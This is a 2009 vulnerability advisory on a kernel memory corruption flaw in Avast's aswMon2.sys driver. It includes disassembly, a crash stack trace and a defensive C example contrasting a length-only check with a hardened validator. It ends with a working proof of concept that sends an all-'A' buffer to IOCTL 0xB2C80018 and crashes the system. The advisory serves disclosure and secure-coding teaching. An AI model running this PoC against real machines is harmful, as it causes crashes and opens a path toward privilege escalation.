Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation.

---------------------------------------------------
Advisory: Avast aswMon2.sys kernel memory corruption and Local Privilege Escalation.

Version Affected: Product: Avast antivirus 4.8.1351.0 (other versions could be affected)
Affected Component: aswMon2.sys 4.8.1351.0
Category: Local Denial of Service due to kernel memory corruption (BSOD)
     (untested) Local Privilege Escalation

Discovery Date: Sep 13, 2009 PoC Code: Sep 13, 2009
Vendor Notify: Sep 15, 2009 Vendor Reply: Sep 15, 2009

Description:
Avast's aswMon2.sys driver does not sanitize user-supplied input (the IOCTL input buffer), which leads to kernel memory corruption. The corruption crashes the system with a BSOD and carries a potential risk of Privilege Escalation.

00010F70 cmp [ebp+arg_C], 288h ;InBuff Len no other checks performed
00010F77 jnz loc_111AC
00010F7D mov esi, [ebp+SourceString]
00010F80 cmp [esi], ebx
00010F82 mov [ebp+arg_C], ebx

[Scroll down for more details...]

Credit:
Giuseppe 'Evilcry' Bonfa' (Project Manager, www.EvilFingers.com)
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org, http://evilcodecave.blogspot.com
http://evilcodecave.wordpress.com

Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There is no representation or warranties, either express or implied by or with respect to anything in this document, and shall not be liable for any implied warranties of merchantability or fitness for a particular purpose or for any indirect special or consequential damages.
---------------------------------------------------

Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption - Details

00010F70 cmp [ebp+arg_C], 288h ;InBuff Len no other checks performed
00010F77 jnz loc_111AC
00010F7D mov esi, [ebp+SourceString]
00010F80 cmp [esi], ebx
00010F82 mov [ebp+arg_C], ebx

Affected IOCTL is B2C80018

UNEXPECTED_KERNEL_MODE_TRAP_M (1000007f)

Transfer Type: METHOD_BUFFERED

STACK_TEXT:

WARNING: Stack unwind information not available. Following frames may be wrong.
f76f3234 8053d251 f76f3250 00000000 f76f32a4 nt+0x600fa
f76f32a4 8052c712 badb0d00 20a0a0a1 f76f5658 nt+0x66251
f76f3328 8052c793 41414141 00000000 f76f377c nt+0x55712
f76f33a4 804fc700 f76f377c f76f3478 05050505 nt+0x55793

.. f76f56d8 f7756a04 badb0d00 8055b256 00000000 nt+0x66251
f76f576c 41414141 41414141 41414141 41414141 aswMon2+0xa04
f76f5770 41414141 41414141 41414141 41414141 0x41414141
f76f5774 41414141 41414141 41414141 41414141 0x41414141
f76f5778 41414141 41414141 41414141 41414141 0x41414141
f76f577c 41414141 41414141 41414141 41414141 0x41414141
f76f5780 41414141 41414141 41414141 41414141 0x41414141
..
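The defensive lesson in the disassembly above is that the handler checks only that the input length equals 0x288 and then trusts everything inside the buffer. The following C program is an added example, not code from the advisory or from Avast: it puts that length-only check (weak_accepts) beside a hardened validator (hardened_validate) for a hypothetical 0x288-byte request layout. The struct fields, the flag mask ASW_KNOWN_FLAGS and the helper functions verdict_for_fields and verdict_for_path are assumptions introduced for illustration, because the real layout of the buffer is not published; the all-'A' input is constructed here and mirrors the shape of the PoC input.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Constructed stand-in for the 0x288-byte input buffer. The advisory only
 * shows that the driver checks the length is 0x288; the real field layout is
 * not published, so every field below is hypothetical. */
#define ASW_INBUF_LEN   0x288
#define ASW_PATH_CHARS  300             /* 600 bytes of UTF-16 */
#define ASW_KNOWN_FLAGS 0x00000003u     /* hypothetical: only two option bits defined */

typedef struct {
    uint32_t flags;                     /* hypothetical option bits */
    uint32_t path_len_bytes;            /* hypothetical: bytes of path[] in use, incl. NUL */
    uint16_t path[ASW_PATH_CHARS];      /* hypothetical NUL-terminated UTF-16 path */
    uint8_t  reserved[ASW_INBUF_LEN - 8 - 2 * ASW_PATH_CHARS];
} asw_request_t;

/* Compile-time check that the layout is exactly 0x288 bytes. */
typedef char asw_layout_check[sizeof(asw_request_t) == ASW_INBUF_LEN ? 1 : -1];

enum asw_verdict {
    ASW_OK = 0, ASW_BAD_LEN, ASW_BAD_FLAGS, ASW_BAD_PATH_LEN,
    ASW_PATH_NOT_TERMINATED, ASW_BAD_RESERVED
};

/* The check the disassembly shows: length equals 0x288, nothing else. */
int weak_accepts(const void *buf, size_t in_len)
{
    (void)buf;
    return in_len == ASW_INBUF_LEN;
}

/* Hardened handler: validate every field before any of it is consumed. With
 * METHOD_BUFFERED the I/O manager has already copied the user data into
 * SystemBuffer, so the values checked here cannot change underneath us. */
enum asw_verdict hardened_validate(const void *buf, size_t in_len)
{
    const asw_request_t *req = (const asw_request_t *)buf;
    size_t i, chars;

    if (buf == NULL || in_len != sizeof(*req))
        return ASW_BAD_LEN;
    if (req->flags & ~ASW_KNOWN_FLAGS)
        return ASW_BAD_FLAGS;
    /* An embedded length must fit the array it describes, in whole UTF-16 units. */
    if (req->path_len_bytes < sizeof(uint16_t) ||
        req->path_len_bytes > sizeof(req->path) ||
        req->path_len_bytes % sizeof(uint16_t) != 0)
        return ASW_BAD_PATH_LEN;
    /* Require the terminator inside the declared range so string routines
     * used later never walk past the buffer. */
    chars = req->path_len_bytes / sizeof(uint16_t);
    if (req->path[chars - 1] != 0)
        return ASW_PATH_NOT_TERMINATED;
    /* Reject undefined trailing data instead of silently ignoring it. */
    for (i = 0; i < sizeof(req->reserved); i++)
        if (req->reserved[i] != 0)
            return ASW_BAD_RESERVED;
    return ASW_OK;
}

/* Fill a request with one byte value, then overwrite the two header fields;
 * fill = 'A' reproduces the shape of the advisory's PoC input. */
enum asw_verdict verdict_for_fields(unsigned char fill, uint32_t flags, uint32_t path_len_bytes)
{
    asw_request_t req;
    memset(&req, fill, sizeof(req));
    req.flags = flags;
    req.path_len_bytes = path_len_bytes;
    return hardened_validate(&req, sizeof(req));
}

/* Build a well-formed request from an ASCII path and validate it. */
enum asw_verdict verdict_for_path(const char *ascii_path)
{
    asw_request_t req;
    size_t n = strlen(ascii_path), i;

    if (n + 1 > ASW_PATH_CHARS)
        return ASW_BAD_PATH_LEN;
    memset(&req, 0, sizeof(req));
    for (i = 0; i < n; i++)
        req.path[i] = (uint16_t)(unsigned char)ascii_path[i];
    req.path_len_bytes = (uint32_t)((n + 1) * sizeof(uint16_t));
    return hardened_validate(&req, sizeof(req));
}

int main(void)
{
    printf("all-'A' buffer : weak=%d hardened=%d\n",
           weak_accepts(NULL, ASW_INBUF_LEN),
           (int)verdict_for_fields('A', 0x41414141u, 0x41414141u));
    printf("well-formed    : weak=%d hardened=%d\n",
           weak_accepts(NULL, ASW_INBUF_LEN),
           (int)verdict_for_path("C:\\Windows\\notepad.exe"));
    return 0;
}
```

Compiled with any C compiler, the program shows the weak check accepting the all-'A' buffer (it is 0x288 bytes long, so nothing else matters) while the hardened validator rejects it at the first field it inspects; a well-formed request passes both. The ordering of the checks also matters in a real driver: lengths that bound other fields are checked before those fields are read.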

Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption - PoC

#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>

/* Opens \\.\Global\<DriverName> (or \\.\<DriverName> on pre-Windows 2000). Taken from esagelab. */
BOOL OpenDevice(PWSTR DriverName, HANDLE *lphDevice)
{
    WCHAR DeviceName[MAX_PATH];
    HANDLE hDevice;

    if ((GetVersion() & 0xFF) >= 5) {
        wcscpy(DeviceName, L"\\\\.\\Global\\");
    } else {
        wcscpy(DeviceName, L"\\\\.\\");
    }
    wcscat(DeviceName, DriverName);
    printf("Opening.. %S\n", DeviceName);

    hDevice = CreateFileW(DeviceName, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                          OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("CreateFile() ERROR %lu\n", GetLastError());
        return FALSE;
    }
    *lphDevice = hDevice;
    return TRUE;
}

int main()
{
    HANDLE hDev = NULL;
    DWORD Junk;

    if (!OpenDevice(L"aswMon", &hDev)) {
        printf("Unable to access aswMon\n");
        return 0;
    }

    /* 0x288 bytes: the only input length the driver accepts for this IOCTL. */
    char *Buff = (char *)VirtualAlloc(NULL, 0x288, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (Buff) {
        memset(Buff, 'A', 0x288);
        DeviceIoControl(hDev, 0xB2C80018, Buff, 0x288, Buff, 0x288, &Junk, (LPOVERLAPPED)NULL);
        printf("DeviceIoControl Executed..\n");
    } else {
        printf("VirtualAlloc() ERROR %lu\n", GetLastError());
    }
    CloseHandle(hDev);
    return 0;
}